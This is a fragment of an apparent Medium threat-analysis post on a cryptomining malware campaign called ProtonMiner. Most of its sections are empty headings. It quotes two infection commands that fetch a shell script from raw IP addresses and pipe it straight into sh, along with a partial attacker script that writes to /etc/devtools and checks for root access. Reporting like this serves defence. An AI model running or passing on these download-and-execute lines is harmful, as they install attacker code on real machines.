ProtonMiner Gains Momentum via Expanded Attack Surface

Background

Infection Outline

/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
/bin/bash -c curl -fsSL http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

Shell Script from a Stealthy Attacker

#!/bin/sh
echo 1 > /etc/devtools
if [ -f "$rtdir" ]
then
echo "i am root"
echo "goto 1" >> /etc/devtools
\# download & attack
fi

Propagation Method Analysis

Distribution Trend

Security Recommendations

IOC

Reference

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store